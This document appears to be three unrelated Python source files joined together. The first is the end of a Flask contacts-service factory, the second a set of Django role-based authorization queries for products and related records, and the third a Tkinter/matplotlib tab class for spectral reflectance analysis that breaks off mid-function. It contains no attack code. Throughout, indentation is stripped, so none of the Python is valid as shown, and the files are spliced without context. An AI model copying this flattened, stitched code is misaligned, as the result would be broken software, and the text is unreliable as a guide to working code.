app.config["VERSION"] = os.environ.get("VERSION")
app.config["LOCAL_ROUTING"] = os.environ.get("LOCAL_ROUTING_NUM")
app.config["PUBLIC_KEY"] = open(os.environ.get("PUB_KEY_PATH"), "r").read()
# Configure database connection
try:
contacts_db = ContactsDb(os.environ.get("ACCOUNTS_DB_URI"), app.logger)
except OperationalError:
app.logger.critical("database connection failed")
sys.exit(1)
return app
if __name__ == "__main__":
# Create an instance of flask server when called directly
CONTACTS = create_app()
CONTACTS.run()
|
from crum import get_current_user
from django.db.models import Exists, OuterRef, Q
from dojo.models import Product, Product_Member, Product_Type_Member, App_Analysis, \
DojoMeta, Product_Group, Product_Type_Group, Languages, Engagement_Presets, \
Product_API_Scan_Configuration
from dojo.authorization.authorization import get_roles_for_permission, user_has_global_permission, user_has_permission, \
role_has_permission
from dojo.group.queries import get_authorized_groups
from dojo.authorization.roles_permissions import Permissions
def get_authorized_products(permission, user=None):
if user is None:
user = get_current_user()
if user is None:
return Product.objects.none()
if user.is_superuser:
return Product.objects.all().order_by('name')
if user_has_global_permission(user, permission):
return Product.objects.all().order_by('name')
roles = get_roles_for_permission(permission)
authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('prod_type_id'),
user=user,
role__in=roles)
authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('pk'),
user=user,
role__in=roles)
authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('prod_type_id'),
group__users=user,
role__in=roles)
authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('pk'),
group__users=user,
role__in=roles)
products = Product.objects.annotate(
prod_type__member=Exists(authorized_product_type_roles),
member=Exists(authorized_product_roles),
prod_type__authorized_group=Exists(authorized_product_type_groups),
authorized_group=Exists(authorized_product_groups)).order_by('name')
products = products.filter(
Q(prod_type__member=True) | Q(member=True) |
Q(prod_type__authorized_group=True) | Q(authorized_group=True))
return products
def get_authorized_members_for_product(product, permission):
user = get_current_user()
if user.is_superuser or user_has_permission(user, product, permission):
return Product_Member.objects.filter(product=product).order_by('user__first_name', 'user__last_name').select_related('role')
else:
return None
def get_authorized_groups_for_product(product, permission):
user = get_current_user()
if user.is_superuser or user_has_permission(user, product, permission):
authorized_groups = get_authorized_groups(Permissions.Group_View)
return Product_Group.objects.filter(product=product, group__in=authorized_groups).order_by('group__name').select_related('role')
else:
return None
def get_authorized_product_members(permission):
user = get_current_user()
if user is None:
return Product_Member.objects.none()
if user.is_superuser:
return Product_Member.objects.all().select_related('role')
if user_has_global_permission(user, permission):
return Product_Member.objects.all().select_related('role')
products = get_authorized_products(permission)
return Product_Member.objects.filter(product__in=products).select_related('role')
def get_authorized_product_members_for_user(user, permission):
request_user = get_current_user()
if request_user is None:
return Product_Member.objects.none()
if request_user.is_superuser:
return Product_Member.objects.filter(user=user).select_related('role', 'product')
if hasattr(request_user, 'global_role') and request_user.global_role.role is not None and role_has_permission(request_user.global_role.role.id, permission):
return Product_Member.objects.filter(user=user).select_related('role', 'product')
products = get_authorized_products(permission)
return Product_Member.objects.filter(user=user, product__in=products).select_related('role', 'product')
def get_authorized_product_groups(permission):
user = get_current_user()
if user is None:
return Product_Group.objects.none()
if user.is_superuser:
return Product_Group.objects.all().select_related('role')
products = get_authorized_products(permission)
return Product_Group.objects.filter(product__in=products).select_related('role')
def get_authorized_app_analysis(permission):
user = get_current_user()
if user is None:
return App_Analysis.objects.none()
if user.is_superuser:
return App_Analysis.objects.all().order_by('name')
if user_has_global_permission(user, permission):
return App_Analysis.objects.all().order_by('name')
roles = get_roles_for_permission(permission)
authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('product__prod_type_id'),
user=user,
role__in=roles)
authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('product_id'),
user=user,
role__in=roles)
authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('product__prod_type_id'),
group__users=user,
role__in=roles)
authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('product_id'),
group__users=user,
role__in=roles)
app_analysis = App_Analysis.objects.annotate(
product__prod_type__member=Exists(authorized_product_type_roles),
product__member=Exists(authorized_product_roles),
product__prod_type__authorized_group=Exists(authorized_product_type_groups),
product__authorized_group=Exists(authorized_product_groups)).order_by('name')
app_analysis = app_analysis.filter(
Q(product__prod_type__member=True) | Q(product__member=True) |
Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
return app_analysis
def get_authorized_dojo_meta(permission):
user = get_current_user()
if user is None:
return DojoMeta.objects.none()
if user.is_superuser:
return DojoMeta.objects.all().order_by('name')
if user_has_global_permission(user, permission):
return DojoMeta.objects.all().order_by('name')
roles = get_roles_for_permission(permission)
product_authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('product__prod_type_id'),
user=user,
role__in=roles)
product_authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('product_id'),
user=user,
role__in=roles)
product_authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('product__prod_type_id'),
group__users=user,
role__in=roles)
product_authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('product_id'),
group__users=user,
role__in=roles)
endpoint_authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('endpoint__product__prod_type_id'),
user=user,
role__in=roles)
endpoint_authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('endpoint__product_id'),
user=user,
role__in=roles)
endpoint_authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('endpoint__product__prod_type_id'),
group__users=user,
role__in=roles)
endpoint_authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('endpoint__product_id'),
group__users=user,
role__in=roles)
finding_authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('finding__test__engagement__product__prod_type_id'),
user=user,
role__in=roles)
finding_authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('finding__test__engagement__product_id'),
user=user,
role__in=roles)
finding_authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('finding__test__engagement__product__prod_type_id'),
group__users=user,
role__in=roles)
finding_authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('finding__test__engagement__product_id'),
group__users=user,
role__in=roles)
dojo_meta = DojoMeta.objects.annotate(
product__prod_type__member=Exists(product_authorized_product_type_roles),
product__member=Exists(product_authorized_product_roles),
product__prod_type__authorized_group=Exists(product_authorized_product_type_groups),
product__authorized_group=Exists(product_authorized_product_groups),
endpoint__product__prod_type__member=Exists(endpoint_authorized_product_type_roles),
endpoint__product__member=Exists(endpoint_authorized_product_roles),
endpoint__product__prod_type__authorized_group=Exists(endpoint_authorized_product_type_groups),
endpoint__product__authorized_group=Exists(endpoint_authorized_product_groups),
finding__test__engagement__product__prod_type__member=Exists(finding_authorized_product_type_roles),
finding__test__engagement__product__member=Exists(finding_authorized_product_roles),
finding__test__engagement__product__prod_type__authorized_group=Exists(finding_authorized_product_type_groups),
finding__test__engagement__product__authorized_group=Exists(finding_authorized_product_groups)
).order_by('name')
dojo_meta = dojo_meta.filter(
Q(product__prod_type__member=True) |
Q(product__member=True) |
Q(product__prod_type__authorized_group=True) |
Q(product__authorized_group=True) |
Q(endpoint__product__prod_type__member=True) |
Q(endpoint__product__member=True) |
Q(endpoint__product__prod_type__authorized_group=True) |
Q(endpoint__product__authorized_group=True) |
Q(finding__test__engagement__product__prod_type__member=True) |
Q(finding__test__engagement__product__member=True) |
Q(finding__test__engagement__product__prod_type__authorized_group=True) |
Q(finding__test__engagement__product__authorized_group=True))
return dojo_meta
def get_authorized_languages(permission):
user = get_current_user()
if user is None:
return Languages.objects.none()
if user.is_superuser:
return Languages.objects.all().order_by('language')
if user_has_global_permission(user, permission):
return Languages.objects.all().order_by('language')
roles = get_roles_for_permission(permission)
authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('product__prod_type_id'),
user=user,
role__in=roles)
authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('product_id'),
user=user,
role__in=roles)
authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('product__prod_type_id'),
group__users=user,
role__in=roles)
authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('product_id'),
group__users=user,
role__in=roles)
languages = Languages.objects.annotate(
product__prod_type__member=Exists(authorized_product_type_roles),
product__member=Exists(authorized_product_roles),
product__prod_type__authorized_group=Exists(authorized_product_type_groups),
product__authorized_group=Exists(authorized_product_groups)).order_by('language')
languages = languages.filter(
Q(product__prod_type__member=True) | Q(product__member=True) |
Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
return languages
def get_authorized_engagement_presets(permission):
user = get_current_user()
if user is None:
return Engagement_Presets.objects.none()
if user.is_superuser:
return Engagement_Presets.objects.all().order_by('title')
if user_has_global_permission(user, permission):
return Engagement_Presets.objects.all().order_by('title')
roles = get_roles_for_permission(permission)
authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('product__prod_type_id'),
user=user,
role__in=roles)
authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('product_id'),
user=user,
role__in=roles)
authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('product__prod_type_id'),
group__users=user,
role__in=roles)
authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('product_id'),
group__users=user,
role__in=roles)
engagement_presets = Engagement_Presets.objects.annotate(
product__prod_type__member=Exists(authorized_product_type_roles),
product__member=Exists(authorized_product_roles),
product__prod_type__authorized_group=Exists(authorized_product_type_groups),
product__authorized_group=Exists(authorized_product_groups)).order_by('title')
engagement_presets = engagement_presets.filter(
Q(product__prod_type__member=True) | Q(product__member=True) |
Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
return engagement_presets
def get_authorized_product_api_scan_configurations(permission):
user = get_current_user()
if user is None:
return Product_API_Scan_Configuration.objects.none()
if user.is_superuser:
return Product_API_Scan_Configuration.objects.all()
if user_has_global_permission(user, permission):
return Product_API_Scan_Configuration.objects.all()
roles = get_roles_for_permission(permission)
authorized_product_type_roles = Product_Type_Member.objects.filter(
product_type=OuterRef('product__prod_type_id'),
user=user,
role__in=roles)
authorized_product_roles = Product_Member.objects.filter(
product=OuterRef('product_id'),
user=user,
role__in=roles)
authorized_product_type_groups = Product_Type_Group.objects.filter(
product_type=OuterRef('product__prod_type_id'),
group__users=user,
role__in=roles)
authorized_product_groups = Product_Group.objects.filter(
product=OuterRef('product_id'),
group__users=user,
role__in=roles)
product_api_scan_configurations = Product_API_Scan_Configuration.objects.annotate(
product__prod_type__member=Exists(authorized_product_type_roles),
product__member=Exists(authorized_product_roles),
product__prod_type__authorized_group=Exists(authorized_product_type_groups),
product__authorized_group=Exists(authorized_product_groups))
product_api_scan_configurations = product_api_scan_configurations.filter(
Q(product__prod_type__member=True) | Q(product__member=True) |
Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
return product_api_scan_configurations
|
from tkinter import BOTH, Menu
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
from tanager_feeder.plotter.sample import Sample
from tanager_feeder.plotter.plot import Plot
from tanager_feeder.plotter.hemisphere_plotter import HemispherePlotter
from tanager_feeder import utils
class Tab:
# Title override is true if the title of this individual tab is set manually by user.
# If it is False, then the tab and plot title will be a combo of the file title plus the sample that is plotted.
def __init__(
self,
plotter,
title,
samples,
tab_index=None,
geoms=None,
original=None,
x_axis="wavelength",
y_axis="reflectance",
xlim=None,
ylim=None,
exclude_artifacts=False,
exclude_specular=False,
specularity_tolerance=None,
):
self.hemisphere_plotter = HemispherePlotter()
if geoms is None:
geoms = {"i": [], "e": [], "az": []}
self.plotter = plotter
if original is None: # This is true if we're not normalizing anything.
# holding on to the original data lets us reset.
self.original_samples = list(samples)
else:
self.original_samples = original
self.samples = samples
self.geoms = geoms
self.notebook_title = None
self.set_title(
title, init=True
) # set self.notebook title, add to plotter's list of titles, and add e.g. (1) if needed.
self.x_axis = x_axis
self.y_axis = y_axis
self.xlim = xlim
self.ylim = ylim
self.zlim = None
self.exclude_artifacts = exclude_artifacts
self.exclude_specular = exclude_specular
self.specularity_tolerance = specularity_tolerance
self.width = self.plotter.notebook.winfo_width()
self.height = self.plotter.notebook.winfo_height()
# If we need a bigger frame to hold a giant long legend, expand.
self.legend_len = 0
for sample in self.samples:
self.legend_len += len(sample.geoms)
self.legend_height = self.legend_len * 21 + 100 # 21 px per legend entry.
self.plot_scale = (self.height - 130) / 21
self.plot_width = self.width / 9 # very vague character approximation of plot width
if self.height > self.legend_height:
self.top = utils.NotScrolledFrame(self.plotter.notebook)
self.oversize_legend = False
else:
self.top = utils.VerticalScrolledFrame(self.plotter.controller, self.plotter.notebook)
self.oversize_legend = True
self.top.min_height = np.max([self.legend_height, self.height - 50])
self.top.pack()
# If this is being created from the File -> Plot option, or from right click -> new tab, just put the
# tab at the end.
if tab_index is None:
self.plotter.notebook.add(self.top, text=self.notebook_title + " x")
self.plotter.notebook.select(self.plotter.notebook.tabs()[-1])
self.index = self.plotter.notebook.index(self.plotter.notebook.select())
# If this is being called after the user did Right click -> choose samples to plot, put it at the same
# index as before.
else:
self.plotter.notebook.add(self.top, text=self.notebook_title + " x")
self.plotter.notebook.insert(tab_index, self.plotter.notebook.tabs()[-1])
self.plotter.notebook.select(self.plotter.notebook.tabs()[tab_index])
self.index = tab_index
self.fig = mpl.figure.Figure(
figsize=(self.width / self.plotter.dpi, self.height / self.plotter.dpi), dpi=self.plotter.dpi
)
with plt.style.context(("default")):
self.white_fig = mpl.figure.Figure(
figsize=(self.width / self.plotter.dpi, self.height / self.plotter.dpi), dpi=self.plotter.dpi
)
self.canvas = FigureCanvasTkAgg(self.fig, master=self.top.interior)
self.white_canvas = FigureCanvasTkAgg(self.white_fig, master=self.top.interior)
self.canvas.get_tk_widget().bind("<Button-3>", lambda event: self.open_right_click_menu(event))
self.canvas.get_tk_widget().bind("<Button-1>", lambda event: self.close_right_click_menu(event))
self.canvas.get_tk_widget().pack(expand=True, fill=BOTH)
self.plot = Plot(
self.plotter,
self.fig,
self.white_fig,
self.samples,
self.notebook_title,
self.oversize_legend,
self.plot_scale,
self.plot_width,
x_axis=self.x_axis,
y_axis=self.y_axis,
xlim=self.xlim,
ylim=self.ylim,
exclude_artifacts=self.exclude_artifacts,
draw=True,
)
# return
# if draw:
# self.canvas.draw() # sometimes silently crashes.
# # Related to thread safety (only crashes for remote plotting, which involves a
# # separate thread). To protect against this, draw will be false if this is called from a separate
# # thread and the user is asked for input instead.
self.popup_menu = Menu(self.top.interior, tearoff=0)
if self.x_axis == "wavelength" and (self.y_axis == "reflectance" or self.y_axis == "normalized reflectance"):
self.popup_menu.add_command(label="Edit plot", command=self.ask_which_samples)
self.popup_menu.add_command(label="Plot settings", command=self.open_plot_settings)
self.popup_menu.add_command(label="Open analysis tools", command=self.open_analysis_tools)
else:
self.popup_menu.add_command(label="Plot settings", command=self.open_plot_settings)
self.save_menu = Menu(self.popup_menu, tearoff=0)
self.save_menu.add_command(label="White background", command=self.save_white)
self.save_menu.add_command(label="Dark background", command=self.save_dark)
self.popup_menu.add_cascade(label="Save plot", menu=self.save_menu)
self.popup_menu.add_command(label="Export data to .csv", command=self.export)
self.popup_menu.add_command(label="New tab", command=self.new)
self.popup_menu.add_command(label="Close tab", command=self.close)
self.plotter.menus.append(self.popup_menu)
self.contour_sample = None
self.incidence_samples = None
self.emission_samples = None
self.error_samples = None
self.base_sample = None
self.recip_samples = None
self.sample_options_dict = None
self.sample_options_list = None
self.base_spectrum_label = None
self.existing_indices = None
self.frozen = False
def freeze(self):
self.frozen = True
def unfreeze(self):
self.frozen = False
def save_white(self):
self.canvas.get_tk_widget().pack_forget()
self.white_canvas.get_tk_widget().pack(expand=True, fill=BOTH)
self.white_canvas.get_tk_widget().bind("<Button-3>", lambda event: self.open_right_click_menu(event))
self.white_canvas.get_tk_widget().bind("<Button-1>", lambda event: self.close_right_click_menu(event))
self.plot.save(self.white_fig)
def export(self):
path = self.plotter.get_path()
if not path:
return
if path[-4 : len(path)] != ".csv":
path += ".csv"
headers = self.plot.visible_data_headers
data = self.plot.visible_data
headers = (",").join(headers)
# data=np.transpose(data) doesn't work if not all columns are same length
data_lines = []
max_len = 0
for col in data:
if len(col) > max_len:
max_len = len(col)
for col in data:
j = 0
for val in col:
if j < len(data_lines):
data_lines[j] += "," + str(val)
else:
data_lines.append(str(val))
j = j + 1
while j < max_len:
data_lines[j] += ","
j += 1
with open(path, "w+") as f:
f.write(headers + "\n")
for line in data_lines:
f.write(line + "\n")
def save_dark(self):
self.white_canvas.get_tk_widget().pack_forget()
self.canvas.get_tk_widget().pack(expand=True, fill=BOTH)
self.canvas.get_tk_widget().bind("<Button-3>", lambda event: self.open_right_click_menu(event))
self.canvas.get_tk_widget().bind("<Button-1>", lambda event: self.close_right_click_menu(event))
self.plot.save(self.fig)
def new(self):
self.plotter.new_tab()
def open_options(self):
self.plotter.controller.open_options(self, self.notebook_title)
# This is needed so that this can be one of the parts of a dict for buttons:
# self.view_notebook.select:[lambda:tab.get_top()],.
# That way when the top gets recreated in refresh, the reset button will get the new one instead of creating
# errors by getting the old one.
def get_top(self):
return self.top
def set_exclude_artifacts(self, exclude_bool):
for i, sample in enumerate(self.plot.samples):
sample.set_colors(self.plot.hues[i % len(self.plot.hues)])
i = len(self.plot.ax.lines)
j = 0
# Delete all of the lines except annotations e.g. vertical lines showing where slopes are being calculated.
for _ in range(i):
if self.plot.ax.lines[j] not in self.plot.annotations:
self.plot.ax.lines[j].remove()
else:
j += 1
j = 0
for _ in range(i):
if self.plot.white_ax.lines[j] not in self.plot.white_annotations:
self.plot.white_ax.lines[j].remove()
else:
j += 1
self.exclude_artifacts = exclude_bool
self.plot.exclude_artifacts = bool
self.plot.draw()
self.canvas.draw()
self.white_canvas.draw()
def on_visibility(self, event):
self.close_right_click_menu(event)
# find reflectance at a given wavelength.
# if we're on the edges, average out a few values.
@staticmethod
def get_vals(wavelengths, reflectance, nm):
index = (np.abs(wavelengths - nm)).argmin() # find index of wavelength
r = reflectance[index]
w = wavelengths[index]
if (
wavelengths[index] < 600 or wavelengths[index] > 2200
): # If we're on the edges, spectra are noisy. Calculate slopes based on an average.
if 2 < index < len(reflectance):
r = np.mean(reflectance[index - 3 : index + 3])
w = wavelengths[index]
elif index > 2:
r = np.mean(reflectance[-7:-1])
w = wavelengths[-4]
elif index < len(reflectance) - 3:
r = np.mean(reflectance[0:6]) # Take the first 6 values if you are at the beginning
w = wavelengths[3]
return w, r
@staticmethod
def get_index(array, val):
index = (np.abs(array - val)).argmin()
return index
def offset(self, sample_name, offset):
if ":" in sample_name:
title = sample_name.split(":")[0]
name = sample_name.split(":")[1]
else:
title = None
name = sample_name
for i, sample in enumerate(self.samples):
if name == sample.name:
if title is None or sample.title == title:
self.samples.pop(i)
new_sample = Sample(sample.name, sample.file, sample.title)
new_sample.data = {}
for key in sample.data:
new_sample.data[key] = {}
for key2 in sample.data[key]:
new_sample.data[key][key2] = list(sample.data[key][key2])
new_sample.geoms = list(sample.geoms)
new_sample.add_offset(offset, self.y_axis)
self.samples.insert(i, new_sample)
self.refresh(original=self.original_samples, y_axis=self.y_axis)
break
def calculate_avg_reflectance(self, left, right):
left, right = self.validate_left_right(left, right)
avgs = []
self.incidence_samples = []
self.emission_samples = []
artifact_warning = False
self.contour_sample = Sample("all samples", "file", "title")
self.contour_sample.data = {"all samples": {"i": [], "e": [], "average reflectance": []}}
self.contour_sample.geoms = []
for i, sample in enumerate(self.samples):
incidence_sample = Sample(sample.name, sample.file, sample.title)
emission_sample = Sample(sample.name, sample.file, sample.title)
for geom in sample.geoms:
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
if (
self.exclude_artifacts
): # If we are excluding artifacts, don't calculate reflectance for anything in the range that
# is considered to be suspect
if self.plotter.artifact_danger(g, left, right):
artifact_warning = True
continue
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom][self.y_axis])
index_left = self.get_index(wavelengths, left)
index_right = self.get_index(wavelengths, right)
avg = np.mean(reflectance[index_left:index_right])
i_geom = (i, None, None)
e_geom = (None, e, None)
if i_geom not in incidence_sample.data:
incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "average reflectance": []}
incidence_sample.geoms.append(i_geom)
if e_geom not in emission_sample.data:
emission_sample.data[e_geom] = {"i": [], "average reflectance": []}
emission_sample.geoms.append(e_geom)
incidence_sample.data[i_geom]["e"].append(e)
incidence_sample.data[i_geom]["az"].append(az)
incidence_sample.data[i_geom]["theta"].append(e)
incidence_sample.data[i_geom]["g"].append(g)
incidence_sample.data[i_geom]["average reflectance"].append(avg)
emission_sample.data[e_geom]["i"].append(i)
emission_sample.data[e_geom]["average reflectance"].append(avg)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
self.contour_sample.data["all samples"]["average reflectance"].append(avg)
avgs.append(str(geom) + ": " + str(avg))
self.emission_samples.append(emission_sample)
self.incidence_samples.append(incidence_sample)
self.plot.draw_vertical_lines([left, right])
return left, right, avgs, artifact_warning
def calculate_band_centers(self, left, right, use_max_for_centers, center_based_on_delta_to_continuum):
left, right = self.validate_left_right(left, right)
centers = []
self.incidence_samples = []
self.emission_samples = []
artifact_warning = False
self.contour_sample = Sample("all samples", "file", "title")
self.contour_sample.data = {"all samples": {"i": [], "e": [], "band center": []}}
self.contour_sample.geoms = []
for i, sample in enumerate(self.samples):
incidence_sample = Sample(sample.name, sample.file, sample.title)
emission_sample = Sample(sample.name, sample.file, sample.title)
for geom in sample.geoms:
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
if (
self.exclude_artifacts
): # If we are excluding artifacts, don't calculate slopes for anything in the range that is
# considered to be suspect
if self.plotter.artifact_danger(g, left, right):
artifact_warning = True
continue
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom][self.y_axis])
# find reflectance at left and right wavelengths.
# if we're on the edges, average out a few values.
w_left, r_left = self.get_vals(wavelengths, reflectance, left)
index_left = self.get_index(wavelengths, left)
w_right, r_right = self.get_vals(wavelengths, reflectance, right)
index_right = self.get_index(wavelengths, right)
slope = (r_right - r_left) / (w_right - w_left)
continuum = reflectance[index_left] + slope * (
wavelengths[index_left:index_right] - wavelengths[index_left]
)
diff = continuum - reflectance[index_left:index_right]
if center_based_on_delta_to_continuum:
index_peak = list(diff).index(
np.min(diff)
) # this is confusing, because we report an absorption band as positive depth, a local maximum
# in the spectrum occurs at the minimum value of diff.
index_trough = list(diff).index(np.max(diff))
else:
r_trough = np.min(reflectance[index_left:index_right])
r_peak = np.max(reflectance[index_left:index_right])
index_trough = list(reflectance[index_left:index_right]).index(r_trough)
index_peak = list(reflectance[index_left:index_right]).index(r_peak)
if np.abs(diff[index_peak]) > np.abs(diff[index_trough]) and use_max_for_centers:
center = wavelengths[index_peak + index_left]
else:
center = wavelengths[index_trough + index_left]
i_geom = (i, None, None)
e_geom = (None, e, None)
if i_geom not in incidence_sample.data:
incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "band center": []}
incidence_sample.geoms.append(i_geom)
if e_geom not in emission_sample.data:
emission_sample.data[e_geom] = {"i": [], "az": [], "band center": []}
emission_sample.geoms.append(e_geom)
incidence_sample.data[i_geom]["e"].append(e)
incidence_sample.data[i_geom]["az"].append(az)
incidence_sample.data[i_geom]["theta"].append(e)
incidence_sample.data[i_geom]["g"].append(g)
incidence_sample.data[i_geom]["band center"].append(center)
emission_sample.data[e_geom]["i"].append(i)
emission_sample.data[e_geom]["az"].append(az)
emission_sample.data[e_geom]["band center"].append(center)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
self.contour_sample.data["all samples"]["band center"].append(center)
centers.append(str(geom) + ": " + str(center))
self.emission_samples.append(emission_sample)
self.incidence_samples.append(incidence_sample)
self.plot.draw_vertical_lines([left, right])
return left, right, centers, artifact_warning
def calculate_band_depths(self, left, right, report_negative, center_based_on_delta_to_continuum):
left, right = self.validate_left_right(left, right)
depths = []
self.incidence_samples = []
self.emission_samples = []
artifact_warning = False
self.contour_sample = Sample("all samples", "file", "title")
self.contour_sample.data = {"all samples": {"i": [], "e": [], "band depth": []}}
self.contour_sample.geoms = ["all samples"]
for i, sample in enumerate(self.samples):
incidence_sample = Sample(sample.name, sample.file, sample.title)
emission_sample = Sample(sample.name, sample.file, sample.title)
for geom in sample.geoms:
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
if (
self.exclude_artifacts
): # If we are excluding artifacts, don't calculate slopes for anything in the range that is
# considered to be suspect
if self.plotter.artifact_danger(g, left, right):
artifact_warning = True
continue
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom][self.y_axis])
# find reflectance at left and right wavelengths.
# if we're on the edges, average out a few values.
w_left, r_left = self.get_vals(wavelengths, reflectance, left)
index_left = self.get_index(wavelengths, left)
w_right, r_right = self.get_vals(wavelengths, reflectance, right)
index_right = self.get_index(wavelengths, right)
slope = (r_right - r_left) / (w_right - w_left)
continuum = reflectance[index_left] + slope * (
wavelengths[index_left:index_right] - wavelengths[index_left]
)
diff = (continuum - reflectance[index_left:index_right]) / continuum
if center_based_on_delta_to_continuum:
index_peak = list(diff).index(
np.min(diff)
) # this is confusing, because we report an absorption band as positive depth, a local maximum
# in the spectrum occurs at the minimum value of diff.
index_trough = list(diff).index(np.max(diff))
else:
r_trough = np.min(reflectance[index_left:index_right])
r_peak = np.max(reflectance[index_left:index_right])
index_trough = list(reflectance[index_left:index_right]).index(r_trough)
index_peak = list(reflectance[index_left:index_right]).index(r_peak)
if np.abs(diff[index_peak]) > np.abs(diff[index_trough]) and report_negative:
depth = diff[index_peak]
else:
depth = diff[index_trough]
i_geom = (i, None, None)
e_geom = (None, e, None)
if i_geom not in incidence_sample.data:
incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "band depth": []}
incidence_sample.geoms.append(i_geom)
if e_geom not in emission_sample.data:
emission_sample.data[e_geom] = {"i": [], "az": [], "band depth": []}
emission_sample.geoms.append(e_geom)
incidence_sample.data[i_geom]["e"].append(e)
incidence_sample.data[i_geom]["az"].append(az)
incidence_sample.data[i_geom]["theta"].append(e)
incidence_sample.data[i_geom]["g"].append(g)
incidence_sample.data[i_geom]["band depth"].append(depth)
emission_sample.data[e_geom]["i"].append(i)
emission_sample.data[e_geom]["az"].append(az)
emission_sample.data[e_geom]["band depth"].append(depth)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
self.contour_sample.data["all samples"]["band depth"].append(depth)
depths.append(str(geom) + ": " + str(depth))
self.emission_samples.append(emission_sample)
self.incidence_samples.append(incidence_sample)
self.plot.draw_vertical_lines([left, right])
return left, right, depths, artifact_warning
@staticmethod
def get_e_i_g(label): # Extract e, i, and g from a label.
i = float(label.split("i=")[1].split(" ")[0])
e = float(label.split("e=")[1].split(" ")[0].strip(")"))
az = float(label.split("az=")[1].strip(")"))
g = utils.get_phase_angle(i, e, az)
return e, i, g
def calculate_slopes(self, left, right):
left, right = self.validate_left_right(left, right)
slopes = []
self.incidence_samples = []
self.emission_samples = []
self.contour_sample = Sample("all samples", "file", "title")
self.contour_sample.data = {"all samples": {"i": [], "e": [], "slope": []}}
self.contour_sample.geoms = ["all samples"]
artifact_warning = False
for i, sample in enumerate(self.samples):
incidence_sample = Sample(sample.name, sample.file, sample.title)
emission_sample = Sample(sample.name, sample.file, sample.title)
for geom in sample.geoms:
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
if (
self.exclude_artifacts
): # If we are excluding artifacts, don't calculate slopes for anything in the range that is
# considered to be suspect
if self.plotter.artifact_danger(g, left, right):
artifact_warning = True # We'll return this to the controller, which will throw up a dialog
# warning the user that we are skipping some spectra.
continue
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(
sample.data[geom][self.y_axis]
) # y_axis is either reflectance or normalized reflectance
# find reflectance at left and right wavelengths.
# if we're on the edges, average out a few values.
w_left, r_left = self.get_vals(wavelengths, reflectance, left)
w_right, r_right = self.get_vals(wavelengths, reflectance, right)
slope = (r_right - r_left) / (w_right - w_left)
i_geom = (i, None, None)
e_geom = (None, e, None)
if i_geom not in incidence_sample.data:
incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "slope": []}
incidence_sample.geoms.append(i_geom)
if e_geom not in emission_sample.data:
emission_sample.data[e_geom] = {"i": [], "az": [], "slope": []}
emission_sample.geoms.append(e_geom)
incidence_sample.data[i_geom]["e"].append(e)
incidence_sample.data[i_geom]["az"].append(az)
incidence_sample.data[i_geom]["theta"].append(e)
incidence_sample.data[i_geom]["g"].append(g)
incidence_sample.data[i_geom]["slope"].append(slope)
emission_sample.data[e_geom]["i"].append(i)
emission_sample.data[e_geom]["az"].append(az)
emission_sample.data[e_geom]["slope"].append(slope)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
self.contour_sample.data["all samples"]["slope"].append(slope)
slopes.append(str(geom) + ": " + str(slope))
self.emission_samples.append(emission_sample)
self.incidence_samples.append(incidence_sample)
self.plot.draw_vertical_lines([left, right])
return left, right, slopes, artifact_warning
def validate_left_right(self, left, right):
try:
left = float(left)
except ValueError:
for sample in self.samples:
for i, geom in enumerate(sample.geoms):
wavelengths = np.array(sample.data[geom]["wavelength"])
if i == 0:
left = np.min(wavelengths)
else:
left = np.min([left, np.min(wavelengths)])
try:
right = float(right)
except ValueError:
